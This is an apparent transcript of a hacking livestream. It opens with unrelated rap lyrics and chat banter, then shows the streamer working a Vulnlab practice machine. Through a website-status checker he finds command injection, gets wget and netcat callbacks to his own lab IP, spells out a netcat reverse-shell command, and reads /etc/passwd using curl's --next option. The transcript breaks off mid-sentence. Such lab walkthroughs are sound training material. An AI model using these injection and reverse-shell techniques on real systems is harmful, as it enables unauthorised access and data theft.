Can I ask you where your soul is at? Yeah, cause they get funny with that holy rap. Dang, cause I can do this all day though. My homies call me Thanos, cause that brother only stab. Living in a new era when they only camp. Southside intellectual and holy black. I like Jesus over Florida trap. Living water by the picture, won't you get a catch? Richard God, man, that boy looking like Goldman Sachs. Wait, just run it up, I got an open tab. Hey, and won't you go and get another round? They gon' have to gun me down. I don't thumb it down. I be giving all I got. Really living more than sentimental. Put it in the middle of an instrumental. Every jot and tittle from my brother, pencil riddle. With the scribbles of the father's riddles. Let me get a griddle. Can I cook a little with the modesty? I tell him I am not playing, boy. Jesus coming back and I am not staying, boy. You loving money ain't looking too favorable. Blood on my hands if I don't say what I say to you. Hip-hop is dying and I brought the savior to her. And it's unbreakable. You better make a move. What you gon' take, what you I never switched up, I never ditched us. When they dissed us, I didn't flinch up. Ask my sister, we don't give up. Ready to die for the truth that clinched us. You can't bench us, get your weight up, cause you can't bench stuff while we lift up. I come around, man, the boy be business. Everybody down with the Lord be with you, nah, man. Sing my song, I just sing my song. Let's go, let's go, yeah, sing my song. This is not a drill, it's a real attack. For the squad and affiliates. I make it epic, come in the air. You're playing with me, I go really bad. All 19, promise they gon' need to hold me back. Yeah, they gon' have to hold me back. Hold me back, they gon' have to hold me back. Hold me back, really on guard. Really on guard, really on guard. Really on guard. I've been really on guard. Really on guard. Ay, really on guard. Me and my dogs try to pull a call, and the king is all it's all. 15 years wrong. If I got more, he can have it all, yo. He can have it all, yo. Let the sweat fall till the world knows, yeah. Your glory alone. Now only for my sons, all for the lover of my soul. Even unto death. I don't even know where that came from. Lead the signs to the zodiac. Ay, I don't need them, I just go attack. Ay, I make it epic, come in the air. Ay, quit playing with me, I go really bad. All 19, listen, they gon' have to hold me back. Ay, yeah, they gon' have to hold me back. Hold me back, ay, they gon' have to hold me back. Hold me back, yeah, really on guard, yeah, really on guard, yeah. Southside baby, calling them KB, still going crazy, we on okay. Calls from the mainstream, jewels on jewels in the chains. We tell them that life is a vape, blood go crazy. Thugs gotta change, she for them like Gracie. This MMA never did change me, though they didn't play me, but never did play me. Levi I came, all of the dogs, the leaders and called. I needed Dion, ain't bringing no tricks. Time is on prime, the Christ Amazon. Anyone from the click can deliver today. Keep it in grace, the people of God get caught in the fray. Care about no views, don't care about no plays. Oh, you went viral. Where the disables you made. You can love Jesus for social media. Look at your DMs, you put them away. Build your little kingdom, you call it the kingdom. You worship the algorithm, not the faith. From lovers of change and lovers of fame. Celebrities, not the annoying, okay. But when all your accounts got an M in them, you can explain anything shady away. Their pockets are filling, their profits are killing. The prophets they killing, they prop up the villains while poverty building. But God and his children on a prodigal mission. Be good at our living, not good in religion. You good to the Christian, cause it's good for your business. Somebody get living, somebody get vision and filled with the spirit. My brothers and sisters, like we ain't safe. This ain't safe. This ain't safe. This ain't safe. Nobody's safe. Nobody's safe. This ain't safe. We ain't safe. Dangerous.
If I had 10,000 tongues, I couldn't tell all that the Lord has done for me. So I'll keep on.
Ladies and gentlemen, welcome back to Hack Smarter Live. This is the third stream in a row. For those of you new, I'm just seeing how many days in a row I can stream. This might be the last day. Maybe we'll make it to 4 days. I have no idea, but here is the third day of 2025, and we are jumping back on stream. So I want to say hello to all of you taking the time to join me. Before I jump over to chat, do want to let you know I am live right now on 3 different platforms. I will monitor chat in all 3 platforms, and you can join on whatever platform works best for you. So I'm live right now on YouTube, LinkedIn, and Twitch. On YouTube and LinkedIn, you can just find me under my name, Tyler Ramsby, and over on Twitch, I stream under the name Hack_Smarter. So LinkedIn and YouTube, Tyler Ramsby. Twitch, it is Hack_Smarter. All of the platform works. My main platform is YouTube. So real quick self-promo, if you have not subbed to me on YouTube, you should. That is where I release all my standalone videos, all of my content. But honestly, for the live streaming, I think Twitch has the best quality. Maybe that's just me, but Twitch just does the best job on the live streaming side of it. But honestly, join whatever platform works best for you. I'm good with all of them. But let me go ahead and pull up chat. Let's see who is all hanging out with us. We have, yes, this is a username. Yes, it has spaces and Y. Cool. We got Techbender, we got Hidden, we got Dario TG, we got Jacob Thompson, we got Bottleneck, we got Lost E, we got Lucas Doom, we got Zero Cool, we have Grim Actual, we have Your Fom, if I'm saying that correctly, we have Reed Hurlbert, if I'm saying that correctly, we got Nefos, what is up, we got Dav Keaton, we got Deadpool 3020, we got Flock in the Basie, if I'm saying that right. But y'all, at 413XLAN, good to have all of you here. Hey, I know a lot of people are lurking. Drop in the chat. Just say hello. Would love to hear from you. Here's a cool thing about watching my stream. You don't have to do a super chat for me to respond to you. Like that's a cool thing. I try to look at all the comments and respond to them. So if you have questions as we go or comments that you have, would love to hear from you. It looks like we have a LinkedIn user. I apologize, LinkedIn user. Sometimes Restream and LinkedIn don't get along well, so it doesn't show me your username. So you just show up as a LinkedIn user for me, but I do see your message from Milwaukee. Good to have you here. We got OP Kevin. I got him. He was lurking. We got Manish. We got Miguel. I'm saying that terribly wrong. All right. Well, y'all, thank you for taking the time to hang out. Our plan for today is we're going to dive back into that Vulnlab machine that we were working on last night. But before we do that, I do have to very quickly record a short standalone video because guess what, guys? Season 7 of Hack the Box starts on Saturday, January 11th, and Hack Smarter has a CTF team that anyone and everyone is able to join. So, wanted to make a quick promo video. I'm going to drop this video next week, Tuesday, and invite people to join the team, but you get to see the filming of the video. So, if you've never been to one of my live streams, this is where I make my standalone videos. This is also where we work through labs in kind of a longer format, and we do a lot of fun stuff. So, buckle in. Here for a ride. So Nefos, I'm guessing you didn't watch the stream from yesterday because I've been streaming every day, but I'm just going through the recommendation list. But even on the stream, I was like, yo, I know Nefos recommended some Vulnlab machines, and for some reason I couldn't find them in our Discord, but I was also streaming when I was doing it. So I maybe didn't find it. So I just went to the next recommended machine, which I think is Down. I'm going off memory, but I think it's Down is the one that we started, and I only spent maybe 30 minutes on it on last night, so I just did initial enumeration on it. But okay, we got Levi Jones jumping in from Arkansas. We got Fyros, if I'm saying that correct. We got Rain and Light. What is up? All right, guys. Let me go ahead and knock out the standalone video real quick. Let me turn off the chat overlay for the video. There we go, and let me think of an introduction. Those of you who are new, I don't script out any of my videos. I literally wing them every single time. So before I wing it, I just need to think real quickly what I want to say. All right, I got it. My last promo, I'd spent a lot more time editing, but video editing just takes time, and I don't like doing it, so we're just going to wing it, and it'll be a very quick invite, inviting people to join the Hack Smarter team for season 7 of Hack the Box. We'll go over some of the new updates for Season 7, and yeah, we'll do this real quick. And my cold, I still have a little bit stuffiness, but you guys can hear me getting better. Like 3 days ago on the first stream of the new year, on New Year's Day, I was pretty stuffed up. Last night was a little bit better. Now I'm doing even better. Oh, you guys want to do Type Racer? All right. You talked me into it, laughing. All right. Chill just for a second, y'all. I need to get Type Racer pulled up. Before we do any standalone videos, we're doing Type Racer. If you've never played Type Racer, we're going to see if you can type faster than me. That is the whole goal of Type Racer. Let me get this pulled up. We will have fun. Before we do our standalone video, before we do any hacking, we're doing Type Racer. Let's see how well you all are at typing. See if anyone can beat me. Let me get my sleeves rolled up, my typing fingers ready. All right, here we go. We're at Type Racer. I'm remembering how to do all of this. I want to race against my friends, so let me create a racetrack. All right, here's our link. All right, I dropped the link, y'all. Come join. Join into the race. Let's see how we do. I just dropped the link over in Restream. You should have it. Join the race. It's going to get started. Oh, I can start it, so I'll give you guys a few minutes to join. Come join the race. We'll see how we do. It looks like I'm that person right there. I am guest to you. You guys are all the other guests. All right, we have quite a few people. Who else wants to join? I'll drop the link one more time. Come join the Type Racer. We'll kick off this stream with some practicing our typing skills like we're in middle school. All right. Well, we have at least a handful. Here we go. Very simple. Once we hit go, you just need to type. It's intense, trust me. Grown human beings, many partially educated. Ah! Oh no, I'm messing up here. Someone might beat me. Did I win? Oh, good. I was not doing good that time, guys. I've been able to get 140 words per minute on stream. I thought I was going to lose that time because I kept having to do typos. That was a hard one. Maybe we'll do one more. Whoever was green right here, you got really close to beating me. Oh man, my heart is beating. Single quotes is messed up. Oh, laughing almost beat me. All right, can we... I'm trying to remember if the race automatically starts again once the last person finishes. Hey, Yellow, finish the race. I believe in you. All right, good job. Oh, shoot, there's a whole nother line of people here. I didn't notice you guys. Come on, y'all. Finish up the race. All right, I'm not going to wait for you guys to finish a race. We're going to do another race real quick just because I want to get into the hacking. All right, let's try this again. Let me leave race and I'm going to create an... What? Can't lose if you never start. That's true, Big Beef. I want to just create a new racetrack. All right, there we go. I got a new link, y'all. Come join in. Let's do another race. One more race before we get to the hacking. I dropped a new link. Join in. I don't see any single quotes on this one. Maybe to go to a little bit better. And maybe Laughing or somebody else can take me from the leaderboard. I have yet to lose this game. At least while streaming. I've played offline a few times and I've lost, but I have not lost this game while streaming. So if anyone can knock me off the leaderboard, I'll be impressed. I didn't realize I wasn't scrolling. Like, look at all these people playing. That's amazing. So we'll see if anybody can beat me. We'll hit start race. And this will be the last one, and then we'll knock out some video stuff. Get ready. Ah! Done. 109 words per minute. It's making me do a test because I think I cheated. Look at that, and I just did 145 words per minute in their little typing challenge. Did I get first? And I did. I remain, ladies and gentlemen, undefeated at Typer Race. That's my one big accomplishment in life. There's a monkey type one? I didn't even know. We'll have to try out monkey type. I've never even heard of that before, but okay. Thank you all for entertaining me and playing the typing game with me. Thank you, Laughing, for the beautiful suggestion of the typing race. All right, drink of water. Maybe we'll end our stream later with another typing race when there's like 90 people on. We'll see if anyone can beat me out of the bigger crowd at the end. Raiden Light got third. Nice. Good work. All right. Now I need to get into make a video for Hack the Box Seasons mode. And stop sniffling into the microphone, because nobody wants to hear that. All right, here we go. I think it's January 11th, right? Is that a Saturday? Let me double check. Yes, that's next Saturday. All right, I know what I want to say. We're going to wing it. Let's see how this goes. Season 7 of Hack the Box starts January 11th, and I want to invite you to join the Hack Smarter CTF team. You've likely heard of Hack Smarter if you are watching this video. If not, I'll drop a link in the description of this video to join us, but you need to go to hacksmarter.org, join our Discord, and I'll also drop a direct link to join our Hack Smarter CTF team. But here's what makes us different. When it comes to joining CTF teams, it can be super intimidating for people, especially if you are new to the field, new to cybersecurity, and new to CTFs in general. Here's the cool thing about our team. It is fully inclusive. Anyone and everyone is welcome to join, regardless of your skill level. Like, we are not competitive in the sense that we want to win. We are competitive in the sense that we want to learn and we want to help one another out. So if that sounds like a team you want to be a part of, you should join us. And there are some really cool updates to Season 7 from Hack the Box that I want to share with you. If you've never checked out Seasons, you need to. Let me share my screen and show you what to expect in Season 7. Now, real quick, before I dive into this, let me explain what these seasons are. Every single week, Hack the Box releases a new seasonal machine. The machine is part of the seasons for 1 week, and you have 1 week to solve the machine. Now, you cannot live stream it, you cannot do write-ups, but here's a cool thing about being part of the Hack Smarter CTF team is we have a channel in our Discord dedicated to working through these machines. So you can help one another out there. You can post spoilers there. We just ask you to use spoiler tags, but all of that is allowed by Hack the Box because we are an official team, and I know I'm not breaking any rules because they actually gave us a shout out in one of their recent blog posts about seasons and about joining different machines. So you can't post write-ups, you cannot live stream, you can't do any of that, but within our Discord community, we can collaborate and work on solving these machines together. But here is what is new with Season 7. Number 1, cubes are making their way into the prize pool. Now, if you've never heard of cubes, it's likely because you haven't done Hack the Box Academy, but Hack the Box Academy is the learning platform behind Hack the Box. They have some incredible pathways. I've done all of the pen tester path, all of the bug bounty path, and I'm currently going through the senior web pen tester path, and you can unlock those paths by paying money, by getting a subscription, or you can unlock those paths with cubes. And now in season 7, you have the opportunity to win cubes. So you can go through some of those paths without paying anything by unlocking those cubes on Hack the Box. And another thing I want you to be aware of is this is completely free. All you need is a free Hack the Box account to be part of the season and to join our CTF team. We'll scroll through. We have a prize pool. You can kind of see what you're able to get. The top 5 get all of these things, which is amazing. You have 1,500 cubes in Hack the Box Academy. To be honest with you, I'm always confused on cubes. I don't know the monetary value of that, but it's a lot. You'll be able to do a lot with 1,500 cubes. 6 through 10, you can see the prizes for that. 10 through 25, and then you can also see these ranks right here. So I'll be honest with you, I'm probably not to get in any of these top places, but you might be able to get in these. So if you get to the Holo one, or Hollow, you get the achievement badge, $25 credit on Hack the Box Labs, 250 cubes in Hack the Box Academy, and a 50% discount swag store. You have platinum, very similar stuff, just a little bit lower, ruby, and then finally silver. So season 7 is coming out. It's going to be a lot of fun. We have a team that we want you to join, and it's super easy to join it. There is a link right here, and I know I have people watching on live stream. I'm live right now as I'm making this video, so for those of you on live stream, let me go ahead and drop this link to you all so you can join this team right now if you would like. But this is the Hack Smarter CTF team. If you go to this link, you should be able to join it once you log into your Hack the Box account, and I will drop a link to this in the description of this video, as well as a link to our Discord, so you can jump in the voice channel, work the machines right alongside of me and the rest of the team. And look at this, y'all. Our team has actually been in the top 10 of Hack the Box seasonable machines. It looks like our best rank was November 24th, 2024, so just about 2 months ago, and we'll see if as a team we can do even better than that. But once again, we are competitive not to win the season, but we are competitive because we want to learn and help one another out. So regardless of your experience level, regardless of where you're at in cybersecurity or pen testing, anyone and everyone is welcome to be part of the Hack Smarter CTF team. So once again, I'll drop links in the description of this video. Would love to see you in the Discord on January 11th as we dive into season 7. Boom. So if you guys haven't joined it, join it. Now I'm just live with you guys on stream. Let me turn on chat. See if I miss any questions here. Evening from Alabama. Hey, David, thank you for hanging out with us. How does Hack the Box decide when to retire machines? I honestly don't know, Moz228. And I don't even know if they've told us how they decide to retire them. Eventually, they all get retired, but I don't know the timeline for that. To AR said, you're the whole reason I got started with hacking, man. Eternally grateful for your videos, especially the older ones from a few years ago. Dude, thank you so much for your kind words. Really appreciate it. But okay, that was the one standalone video I wanted to knock out. Yo, Hip, did I just get raided? By Shy Hat? Here, I need to pull up Twitch now. Because usually when I see Hip Hop Hack, I know it's a raid from the Shy Hat. By Shy Hat? Here, I need to pull. Let me check it out. It's not telling me, but that's because Restream is dumb. But I don't know. Hip Hop Hack is usually the Shy Hat rating. So if it was, let me check. Yeah, I don't know. It doesn't tell me if anyone raided. There we go. Now it popped up just a little bit late. So we have a raid from the Shy Hat. What is up, Raiders? Thank you for joining in. You're actually coming in just at the beginning of the stream, so you are here at a perfect time. I just got done making a standalone video to promote the Hack Smarter CTF team for the upcoming season on Hack the Box, but we're going to spend the rest of our stream diving really blindly into a machine from Vulnlab. Now, I know some of you might be new to Vulnlab, so before we dive into that, let me show you what Vulnlab is. I'll go back to share my screen in just a moment. But Vulnlab is created by one of, if not the top player on Hack the Box, and actually, he is mentioned in this blog that I just made the video about. If we scroll up to the top, we have XCT right here, right? Taking up spot number 3 is past champ and absolute top 3 monster, XCT. He is the creator of Vulnlab. He is also, I think, the captain or one of the main people in the top seasonable machine, and they're also mentioned here. The A team right there, yeah. So the A team are all people who are on Vulnlab. I can pull them up here. If we look at the members, fun little fact, the machine that we are working on today, the Down machine, I believe that's the name of it, is created by JKR, who you can see he is on this team, has a bunch of first bloods on both systems and users, really incredibly smart, talented pen tester, but also super kind person. He actually watches my streams. I'm guessing he will end up watching this one. So hey, JKR, thank you for stopping by. If you end up stopping by, he created the machine that I was working on last night, and he sent me a few hints over Discord. So I'll show you those hints that he sent us, because I identified right away what I needed to identify, and then I fell into a little bit of a rabbit hole. So he was saving me a little bit of time by sending a hint over to me, but he's the creator of the machine we're going to check out tonight. But XCT is the creator of Vulnlab, and he is one of, if not the top Hack the Box player. Also has created a bunch of the machines on Hack the Box, but this is his platform. And what I like about Vulnlab is all the machines are super realistic, but they're also quite difficult. So if you've never done Vulnlab, you are going to get stuck. Matter of fact, I want to show you what XCT said about this, but I need to pull up a URL that isn't supposed to be public. So I made a mistake of making this public in the past, but it's not technically supposed to be public, so I don't want to do that again. But let me see if I can find this quote, because I found it incredibly encouraging. Gosh, where was that at? Give me just a second. It's worth me looking for this quote from XCT on his platform. Yes, I found it. Beautiful. So, hey, peace out, the Shy Hat. Thank you for stopping by and for the raid. Seriously, you're awesome. And let me go ahead and close out Twitch here. I just want to, I'll watch everything on Restream real quick. There we go. So, over on kind of this page for people who have a sub to Vulnlab, which, by the way, you can get a sub for like $14 a month, gives you access to all the standalone machines. He has what would be equivalent to Pro Labs on Hack the Box. We don't have to pay anything extra, but multiple chains, and Red Team Labs, where EDR and everything is fully enabled to emulate a real-world environment. But I love what he says right here. He says, in this section, I'm trying to give a good idea on what machines you want to start with, depending on your goals and skill level. The order is intentional. All of the machines are trying to teach something new, so even the easy ones will at times get you stuck. For me, the easy ones will get me stuck many times just on one machine. But look at this. This is key. This is where the real learning starts, either from blog posts, articles, videos, or walkthroughs. I encourage you to treat looking at walkthroughs as something normal and not as a sign of defeat. The best way of learning is trying for a while, failing, then learning about possible solutions for the next time you encounter such a situation. All right, y'all. We got to say that again for the people in the back. Looking at walkthroughs is normal, and it is not a sign of defeat. You need to look in the mirror and tell that to yourself as you are learning pen testing, learning cybersecurity. The best way of learning is trying for a while, failing, and then learning about possible solutions for the next time you encounter such a situation. So what I can say is, if you check out Vulnlab, you are going to get stuck. I promise. And the easy machines on Vulnlab really aren't easy, but that's a good thing, because it's in those challenging moments that we begin to learn. And here's how I'm doing the Vulnlab machines. Before I would start live streaming, I would hit record and I would try to go through a machine on Hack the Box. Now I can do that with some of the Hack the Box machines. I can go through an entire machine from start to finish in an hour or an hour and a half. That is not true with Vulnlab. These are going to be spread across multiple live streams as we work through it. So right now we're going through the Down machine, and my plan is I will work through the machine live on stream. You'll see my full thought process, my methodology, me stumbling my way through it. And once we solve the machine together, then I'll go back through and make a short standalone video from the perspective of teaching through the machine, not me stumbling around and trying to solve it. So in my live streams, you'll see me stumbling around, and the standalone walkthrough videos I make for Vulnlab machines, that's after I've solved it on live stream and showing a shorter walkthrough of how to solve the machine. So that is what to expect. Let me check out chat, make sure I'm not missing anything. Neil said, finally stayed up late enough to join from the East Coast, right? East side, good to have you here. Jay Pablo said, hey, Tyler, I'm currently on the challenges from attacking AD module and Hack the Box, aiming to get CPTS. Amazing. Let me know how that goes. Do the machines have write-ups? They do have write-ups, bottleneck. Yep, and actually XCT, if you have not checked out his YouTube channel, he has his own YouTube channel where he does some of the walkthroughs for his machines and some of the red team labs, and he is incredibly smart. I mean, like, I'm like way down like an ant on the ground, and he's a giant as it comes to pen testing skills and just technical ability. Check out his videos. I think you'll find them really helpful. Neffel says, I've been stuck in at least 80% of the ones that I've done so far and had to look at write-ups. Yeah, and that's fine, right? The goal is to learn. What up, Kevin? Good to have you here. Madeira, I just made a video about that in my live stream yesterday. So Madeira, I encourage you to watch the live stream from yesterday. I spent a big chunk of it talking about how to get better at web app pen testing. Big Beef said, someday use write-up, someday make write-up. This is life. Absolutely. All right. Let me go ahead and I need to get this machine launched. What's cool about Vulnlab, at least I think it's cool, you launch all the machines from Discord. So I need to go ahead and relaunch this machine, pull up Discord to get things configured. Give me just a second. Jump over to the Vulnlab 1, and we will do this. Machine down. And I'll go ahead and start that. And once again, it's by JKR. I'm going to grab his comments, and I'll show you guys the hints that he gave us, or gave me, but I'm not going to share our DMs because I've DM'd with him quite a bit. Really solid, genuine person, and I don't want to share his private messages. But I think he'd be okay with me sharing the hints that he gave me on stream. So let me go ahead and get these pulled up so you can kind of see what I'm working with from last time. Okay, got that. And let me grab the IP for this machine real quick from Discord. And I'm almost ready to go back to share my screen with you all. And the nice thing about not having the pressure of trying to make a standalone video while we do this, I forgot I don't have Restream chat on here, is we can kind of hang out chill, guys. I have no big agenda. We'll hang out for maybe an hour or so. Because I'm trying to stream every day, I'm probably not going to do like 3 or 4 hour streams. But like 1 hour streams, 1.5 hours, it will be the goal and the plan. You're right, Deadpool. So someone posted that on Discord, which I think is amazing. So congrats to XCT. But they sold out on 365 lab access, which is what I got. You can get 1 year lab access. I think it came down to like $12 a month. That's what I did. But now they're sold out on that. You can still do 90 days of lab access or through a Patreon membership to get lab access. But yeah, Vulnlab must be doing well. That's incredible that they like literally sold out on year-long subs. Amazing. All right, I'm going to get my notes pulled up real quick. I'll give you guys a quick recap of what we did yesterday, and then I'll show the hints that I got. All right, yep, I'm on the right one. Cool. So yesterday when we started this machine, like I said, we only spent a little bit of time on it doing initial enumeration. If you don't use Notion, by the way, here's a cool thing about Notion. It gives you a nice table of contents over on the side. So as long as you use headers and stuff, you can keep your notes relatively organized. But we do enumeration. And I also take my notes as I go. That's another thing I recommend. I don't even do written walkthroughs. I do video walkthroughs. But every time I do a machine, even when I'm offline, I do a full write-up like this in my notes so I can refer back to it or remember things that I did on it. But you can see here, we began with an in-map scan. We just had 2 ports open, port 22, which is SSH, port 80, which is HTTP. On SSH, the first thing I tried is I always see if password authentication is enabled. On an actual pen test, especially an external pen test, if you find SSH being internet exposed and you find that the SSH accepts password authentication, that's actually something you would report on a pen test as an informational or a low finding, because generally speaking, you want to do key-based authentication, not password-based authentication in the real world. So I always check that when SSH is enabled in the real world as well as on CTFs. On port 80, which is the web server, we ran dir search. There wasn't much interesting. Looks like we had a directory redirecting to JavaScript, but outside of that, a bunch of 403s, vhost, and I should add this, there was really nothing interesting as far as vhost goes. When we looked at the website, we very quickly saw potential SSRF. We noticed that it's kind of like down detector. You enter in a URL and it tells you whether or not the website is down. And I just spun up a really quick netcat listener on that. And I noticed, and I even said this on the video, and this is where I was pretty spot on what we needed to find. I said it seems to be using the curl binary on the back end, which I just found to be odd behavior. That is actually passing curl, which made me think that there might be some possible command execution there. Now, we did some very basic command execution fuzzing. I'm gonna uncross this out based on the hints I got from JKR, the creator of this machine. But we did some basic command injection, but we also noticed it's vulnerable to SSRF. Like you can hit localhost. So then I was thinking, hey, maybe we can use SSRF to scan all of the internal facing ports. So there might be another web server that is not internet facing to us, but is only internal. But since we can hit localhost from localhost, we might be able to gain access to an internal web server. Well, based on the hints from JKR, that's actually going to be a rabbit hole and is not going to be our way in. What we want to look at in this stream and to really get to the next step is going to be command injection. Here is what he messaged me over on Discord. Hopefully you can see it okay. He said, hey, hope you won't get too pissed about down. I have hopes you will find the way in somehow. First, I was happy you pointed out curl, and when you thought about command injection, I thought, yes, he thinks it's a curl binary being called, and I pointed that out, I don't know, maybe 10 minutes into the machine, into enumeration. So I'm glad I spotted that. I'm going to call that as a win. He said, spoiler stuff below, feel free to ignore. I'm definitely not going to ignore. He said, I tried some fuzzing lists from seclists, and some might help if you fuzz after your URL. So that's what I think we're going to try to do. We'll do some fuzzing after our URL. So not before it, but after it. And then he said, although maybe it's good to think about how a coder might have implemented the curl execution in PHP. There is ways to prevent command execution in PHP, but there's other injections that are not prevented, and good luck. So got this in from JKR. That's what we're working with. And here's what I want to begin with is doing some fuzzing from seclists, and we'll just take that hint and see if we're able to run with it. Let's go ahead and open up Kaido. We'll give that a second to open. We'll hit start. And I believe I started a project for this, so I should just be able to open up our project right there. And we can. We'll go over to Intercept, open up our browser. And I think, since I already added Etsy host, I would assume this should work. And you know what would be helpful for me to do? It would be really helpful if I got on the VPN before I did anything, right? So let's go ahead and do that before I get ahead of myself. Vulnlab VPN, sudo open VPN. I think I just called it VPN. There we go. We'll name that tab VPN. We'll go to here, terminal, CD over to down. Oh, I didn't even make a folder for it, did I? Nope. So let's make a directory for down, CD over to down, and there we go. So now we're on the VPN. Let me see if I can go ahead and ping down.vl, and I can. Beautiful. I would assume this will work since I changed it in Etsy hosts. Let's go ahead and just give this a shot. Let's first just see if we can hit my IP. We'll do netcat mvlp 80 on here to set up a quick listener. What is up, BlazeBits? Good to have you here. I can't see raids from Restream, so I don't know if you're raiding me. I'm assuming you might just be lurking. So if you are raiding me, let me know. Otherwise, good to have you here. We're working through a lab by Vulnlab and just going into it blind, seeing what we are able to learn. But we have this. We set up the listener. Let's just make sure our project from before is going to work. And it does. So once again, you can see we have SSRF, but it seems to be intended because it's literally a down detector to see if a website is down. But what is peculiar about this is the fact that it's hitting it with curl, which would not be the proper way to implement something like this because curl is an actual binary, which makes me think there has to be a way to get command execution knowing that curl is being implemented. So let's go ahead and see what word list we can use for fuzzing. I'll go ahead and close this out and we'll just go. I like to have my notes in its own separate little window. So we'll do seclist GitHub. And actually, I think I have seclist on here. Let me check real quick. If I ls user share word list sec Do I not have seclists? Okay, you would think I would have seclists. And I know you can sudo app install it, but it takes a little bit of time. So I'm just going to do seclist GitHub command injection. Let's see if we can find some stuff. We'll check out a few of these and see which one seems the most interesting to me. Oh. So this is just a long... We could try this. What's this one? Okay, that's actually command.php. And that's not what we need either. We can begin with this just for the heck of it, because it'll be super easy to test this. That's Windows. This is a Linux machine, so we won't worry about Windows. This is a pretty small word list, so if this doesn't work, we'll get a much more proper word list. But let's fuzz with this and just see what happens. So we'll go ahead and take this request. I'm going to do Control-M to send it out to automate. And here's one spot where Kaido is better than Burp Suite Community Edition. In Burp Suite Community Edition, if you use Intruder, you're going to be super rate limited, and it's going to be a waste of your time. You can, of course, do the same thing with Fafoff. But with Kaido, even the free version of Kaido, you are not rate limited on Intruder like attacks. Kaido calls it automate, but we'll just go ahead and call this test. That's going to be our placeholder, and we will add in a placeholder right there. But Zap, see, I've never gotten into Zap, Big Beef. Do you? You mentioned it in your guide to web app pen testing, so you must enjoy it. I've just never really used Zap because the first time I used it, I didn't like the user interface. So I might just be shallow, but that's literally the only reason I don't use Zap. I like how clean Kaido looks. Well, let's go ahead and do simple list right here. And we'll do Control V right there. We'll paste in our playlist, or not playlist, our payloads. And just to show you what we can do with Kaido, we could jump this number of workers way up, but we'll keep it at 10. We don't want to break anything in the process, but we'll go ahead and try that. We probably want to URL encode, which it already has it on there. So that'll be good. It'll URL encode any special characters. Let's go ahead and hit run and see if we are able to get any other lengths from this. And it doesn't look like we did. Want to see what it's doing. That all looks fine. I'm looking for any difference of length that would show me, hey, the injection was successful, but it doesn't look like it was successful unless it needs to hit an actual valid URL. I doubt that would matter, but just for testing, let's start up a simple Python web server and do that again. And we should see the request come through. Unless they're going almost too fast, like I only got the one to come through. If this is PHP, wouldn't it be worthwhile to fuzz for parameters? I suppose it would be. Yeah, you're right. Because he says, although maybe it's a good idea to think about how a coder might have implemented the curl execution in PHP. Let me try. I'm going to try something really simple. Oh, let me go back to replay. That's what I'm trying to edit. So this for sure comes through, right? This isn't going to be parameter fuzzing, but this is probably going to be too simple. Oh. Oh! Did you guys see that? I have command execution. I was not expecting that to work. I was just thinking maybe if it's curl, we could just do like something like that. Who am I doesn't work. probably because we can't see the output, but we were able to get wget to work right there. Because you can see the command on the background, like what this command is doing is something like this. Is that. That would be the request, because it's curling and then it's wgetting. No such file or directory which matches, nothing matches the given URI. Curl also has next option that can be used as well. Okay, cool. I was not expecting that to work. Let's before we get too excited, let's add that to our notes. We'll grab this, showing the full request, and we will grab a screenshot from here, which I need to go ahead and open up FlameShot. And we'll go like so. And really the indicator that it worked is this get second request right here. All right, it's way too big. All right, we'll go like that, and we'll align it over there. So we have what seems to be command injection. Can I actually get other output from that command injection is what I'm curious about. What does it look like in the actual HTML too? It just shows me the error code there. Nothing matches the given URI. Okay. So what if I do something like, okay, so that doesn't work. If I do nothing for a curl request, does that work? Nope, because we need HTTP, it needs to be in there. So if I do that and just make the curl request fail, okay, I'm just trying to figure out what's like the minimum for it to work. Okay. So that would be the minimum for it to work, and we're able to run a command like wget. And you can see second request right there. So there's a few things that we might be able to do. So scroll also has a next option. I'm curious about that. Make next URL use separate options. J Pablo, I tried that in last night's stream. That was my initial method for trying to get command execution. But we have that. Can I do netcat at all? You know, like what if instead of wget, I do netcat 10.8.4.163 space 80. And we're actually getting a hit with netcat. As you can see right there, it's just not going to close because netcat is waiting for it. But now, just to kind of prove sanity check, if I open up a netcat listener on port 80, we should get another request from the machine, and you can see it right there. We're able to run, well, no, it's still getting HTTP. With curl. So is it actually running curl? Like it's, all right, I need to do this myself. Whoops, I did not mean to do that. Okay, no. So I get that hit there. We just get the error, no host part and URL. I don't know what I did to that terminal. So we are running netcat successfully then. Right? Okay, cool. We got LinkedIn user from Colorado. Hey, good to have you. Unfortunately, Restream and LinkedIn don't like each other, so sometimes I can't see the names on LinkedIn. But either way, good to have you hanging out. We got Def Suthar from India. Today is Saturday, and Happy New Year. Yeah, happy 2025 to you as well, my friend. All right, now, one thing that we could try, but I think the URL encoding is going to kill it. A netcat shell would just be something as simple as netcat 10.8.4.163, 1337-e bin/sh. Oh, okay. Inside your terminal, run next. Okay, so with next, we can actually read files? For real. I will do that, Nefos, but I'm also curious, can I run cat? Does cat just work like this? And then I'll try the next one just for my own learning. No, okay, so that doesn't work, but he is saying try next. Let's try it. Localhost. I'll just URL encode in a second. Next, file, etc password. And we'll go ahead and URL encode. Kaido was having issues doing this in last stream. Yeah, okay, it's definitely a bug in Kaido. You guys see that when I try to do that, it just freaks out. I can't actually do URL encode or anything, which is quite annoying. It might cause me to switch to burp momentarily, but we'll go ahead and do CyberChef. Well, I can URL encode this myself. Wow, okay, so then we have full file read on the machine. That's crazy. And cool. So let's go ahead and grab a screenshot of that. Command injection, we'll say full file read. All right, we'll drop in our full request here just so we have it for our notes. And we don't need that screenshot once again to be that big. Let's make it a little bit smaller. We can always click it if we want it to be bigger. But we have full file read. And yeah, it's PHP, so we probably have RCE as well. We have, just looking at this, we have an Alex user. Surely it's not going to be as easy as something like... I don't know if this will work, but you're not supposed to show user.text and flags on stream, so I'm just going to stop sharing my screen for a moment. No, okay, I don't have to hide anything because that doesn't work. I'm guessing the user the web server is running as isn't going to have permission to actually do that. You know, one thing I haven't done for quite a while in Kaido is I have so many ideas running through my head, guys. It's hard for me to think and do this. Let me show you one idea that just popped in my head. If I go to down/VL, isn't there a PHP when you run this command? Index.php. What if we try to read that? I saw www data, and that's what made me think about that. Okay, so we have our URL form method equals post. URL placeholder, please enter a URL, blah, blah. Okay, maybe nothing interesting. Wait, what? expert mode equals TCP echo is the port reused, or is it just you? What the frick is expert mode? Okay. Let's, once again, I want to take good notes. Let's grab a screenshot of that, but we're going to dig into expert mode right here. I don't know why these screenshots are so big. Am I like zoomed in a lot or something? Oh, I guess I was kind of zoomed in. Maybe that's why they're looking so big. Okay, so I'm going to grab this code. And what I was saying before I got totally distracted by ideas that pop in my head, is I'm curious how good the AI is. There's actually AI built into Kaido. Let's just try this. We'll just see how well this works within 